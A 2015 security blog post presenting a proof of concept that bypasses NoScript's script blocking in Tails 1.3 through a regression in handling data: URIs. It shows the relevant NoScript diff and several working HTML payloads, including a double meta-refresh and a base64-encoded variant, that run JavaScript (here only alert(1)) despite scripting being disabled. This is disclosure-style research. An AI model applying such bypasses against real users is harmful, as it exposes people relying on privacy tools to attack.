Artificial truth

The more you see, the less you believe.

[archives] [latest] | [homepage] | [atom/rss/twitter]

NoScript script-disabled bypass PoC for Tails 1.3
Sun 01 March 2015 — download

A couple of days ago, the Tails Dev discovered that they missed a NoScript update for Tails 1.3 by a couple of hours. It fixes an interesting regression:


  • Fixed regression in causing data: URI documents to be scripting-enabled (thanks GOF for tweet)

I know that Giorgio has some semi-private PoC, but they are not working great in Tails, so I though about giving a try.

This is the relevant excerpt of the diff with site indicating a normal URL, and !site a special one, like data::

-       blockIt = !site || (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
+       blockIt = site && (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));

At first, I was thinking about using the classic thing:

<a target=_blank href="data:text/html,<script>alert(1)</script>">clic</a>

But it seems that you need to refresh the page to trigger the Javascript.

 <a target=_blank href="data:text/html,<META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">clic</a>

This is working! Time to improve it: why not use refresh twice? One time to load our payload, and another one to trigger it.

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html, <META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">

Noscript bypass in Tails 1.3 Yay!

If you 're lazy clever, you could of course use the HTTP location header instead, it'll work too. And since the data: URL-scheme supports base64, you can encode your payload for additional even more l33tness:

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PE1FVEEgSFRUUC1FUVVJVj0ncmVmcmVzaCcgQ09OVEVOVD0nMCc+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=">

Hurray, you can now run your javascript-powered 0-days in script-forbidden Tails!

edit: As said by giorgio, this regression isn't that interesting, since it will be considered cross-domain to everything.